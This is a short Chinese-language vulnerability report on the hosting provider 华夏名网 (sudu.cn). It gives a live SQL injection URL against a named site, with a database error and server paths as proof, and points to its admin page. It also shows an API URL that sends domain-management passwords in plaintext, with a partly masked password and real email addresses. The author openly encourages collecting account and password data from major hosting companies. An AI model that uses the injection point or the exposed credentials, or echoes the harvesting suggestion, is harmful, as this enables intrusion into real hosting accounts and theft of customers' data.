华夏名网程序注入漏洞

https://sudu.cn/website/ 出现在这个页面，其实iframe了个http://web.sudu.cn/webmall/

然后这个成品超市网站就能注射了，http://web.sudu.cn/webmall/detail.php?id=fuck' 这个后台不重要http://web.sudu.cn/admin.php

读到密钥破解后可以到phpweb.net去看自己账户信息等，然后结合自己账户购买网站等信息。

另一点，在华夏名网到处吹嘘史上最好的免费域名注册什么的。。。。 就是.tk米这米几年前在dot.tk就能注册，其实当用户花掉几毛钱（华夏名网并不是免费的，虽然说的是）注册一个tk米之后，域名管理那里，有个发送注册信件到主持人邮箱的功能，那里使用了get方式明文发送....

api.domainshare.tk/resend_email.json?email=webmaster%40bigwww.com&password=feishukeji***&domainname=muingrong.tk&enduseremail=admin%40qq.com

很多废话吧。其实针对这种全国IDC十强主机上，多收集点这种账号、密码等信息是好的，至于好在那里，你懂的！

漏洞证明：

Database error: Invalid SQL: select * from pwn_webmall_spool where id='fuck''

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''fuck''' at line 1)

#0 dbbase_sql->halt(Invalid SQL: select * from pwn_webmall_spool where id='fuck'') called at [/home1/vhost/vh469782/www/includes/db.inc.php:54] #1 dbbase_sql->query(select * from {P}_webmall_spool where id='fuck'') called at [/home1/vhost/vh469782/www/webmall/module/WebMallTempDetail.php:41] #2 WebMallTempDetail() called at [/home1/vhost/vh469782/www/includes/common.inc.php:551] #3 printpage() called at [/home1/vhost/vh469782/www/webmall/detail.php:11]